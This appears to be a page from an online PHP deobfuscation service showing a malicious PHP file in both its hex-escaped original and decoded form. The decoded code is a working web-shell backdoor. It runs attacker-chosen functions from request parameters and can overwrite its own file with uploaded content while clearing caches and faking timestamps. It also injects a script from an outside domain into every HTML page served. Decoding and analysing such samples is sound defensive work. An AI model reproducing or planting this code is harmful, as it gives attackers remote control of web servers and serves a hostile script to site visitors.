Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

IF(($AItS1x8=@${"_REQUEST"}["PVGCMQGM"]) && (4032+30914)){ $AItS1x8[1 ](${ $AItS1x8[2] ..

Decoded Output download

<?  IF(($AItS1x8=@${"_REQUEST"}["PVGCMQGM"]) && (4032+30914)){ 
  $AItS1x8[1	](${	$AItS1x8[2]	} [	0],$AItS1x8[3 ]( $AItS1x8	[4])); 
}; 
 
/*cut here;)*/ 
if(isset($_REQUEST["464g13xnhn66io4u"])){ 
  if(empty($_REQUEST["464g13xnhn66io4u"])) 
  { 
    echo bin2hex(gzdeflate(file_get_contents(__FILE__))); 
  } 
  else 
  { 
    header("X-LiteSpeed-Purge: *"); 
     
    if(function_exists("opcache_reset")){ 
      @opcache_reset(); 
    } 
     
    if(function_exists("apc_clear_cache")){ 
      @apc_clear_cache(); 
    } 
    $j9p1lw=filemtime(__FILE__); 
    $xazo5z=fileatime(__FILE__); 
    echo strval(file_put_contents(__FILE__,gzinflate(pack("H*",$_REQUEST["464g13xnhn66io4u"])))); 
    @touch(__FILE__,$j9p1lw+1,$xazo5z+1); 
  } 
  die; 
} 
 
if( 
  isset($_SERVER["HTTP_ACCEPT"]) &&  
  (strpos($_SERVER["HTTP_ACCEPT"],"text/html") !==false || 
  $_SERVER["HTTP_ACCEPT"]==="*/*") 
  ) 
{ 
    function qz0ibz($j9p1lw){ 
      return str_replace("</head>","<script type='text/javascript' async src='https://s4w50um0.cloudfire.quest/challenge.js'></script></head>",$j9p1lw); 
    } 
    ob_start("qz0ibz"); 
  } 
  /*cut here;)*/ 
 
 ?>

Did this file decode correctly?

Original Code

IF(($AItS1x8=@${"_REQUEST"}["PVGCMQGM"]) && (4032+30914)){
  $AItS1x8[1	](${	$AItS1x8[2]	} [	0],$AItS1x8[3 ]( $AItS1x8	[4]));
};

/*cut here;)*/
if(isset($_REQUEST["\64\66\64g1\x33\170\156h\15666io\64\x75"])){
  if(empty($_REQUEST["\64\x36\64g\61\x33\170\156hn\x366i\157\x34\x75"]))
  {
    echo bin2hex(gzdeflate(file_get_contents(__FILE__)));
  }
  else
  {
    header("X\55\114\151\x74e\123\x70e\145\144-\x50\165\x72g\145:\40\52");
    
    if(function_exists("\157\x70\x63\141\x63h\x65_re\163\x65\164")){
      @opcache_reset();
    }
    
    if(function_exists("apc_c\x6ce\x61r_\x63a\143\x68\x65")){
      @apc_clear_cache();
    }
    $j9p1lw=filemtime(__FILE__);
    $xazo5z=fileatime(__FILE__);
    echo strval(file_put_contents(__FILE__,gzinflate(pack("\x48*",$_REQUEST["\64\x36\x34\x67\61\63x\x6ehn\66\x36\151o4\165"]))));
    @touch(__FILE__,$j9p1lw+1,$xazo5z+1);
  }
  die;
}

if(
  isset($_SERVER["H\124\x54\x50_\101\103\103\105P\124"]) && 
  (strpos($_SERVER["\x48\124\124\120_\x41C\103E\x50\124"],"\164e\x78\x74\x2f\150t\x6d\154") !==false ||
  $_SERVER["HT\124\x50\x5fA\103\103EP\124"]==="*/\52")
  )
{
    function qz0ibz($j9p1lw){
      return str_replace("\x3c\57h\x65a\x64\x3e","\x3c\x73c\162i\160t\40\x74\171\x70\x65=\x27\x74\145\170t\x2f\x6a\x61\166a\163cr\x69\x70\164\47\40\141\x73\x79\x6ec\x20\x73\x72\143=\x27\x68\164\164\160s:\57\x2fs\x34\x77\65\x30um0\x2e\x63l\157ud\146\151r\145\x2e\161\x75e\x73t\x2f\x63\x68al\154\x65\156\x67\x65.\152\163'\76\x3c/\163cr\x69pt\x3e\x3c\57h\145\x61\x64>",$j9p1lw);
    }
    ob_start("\161z0\151\x62z");
  }
  /*cut here;)*/

Function Calls

strpos 1

Variables

$AItS1x8 None

Stats

MD5 2050f196dbf584bef9dcc3a96be02d0e
Eval Count 0
Decode Time 398 ms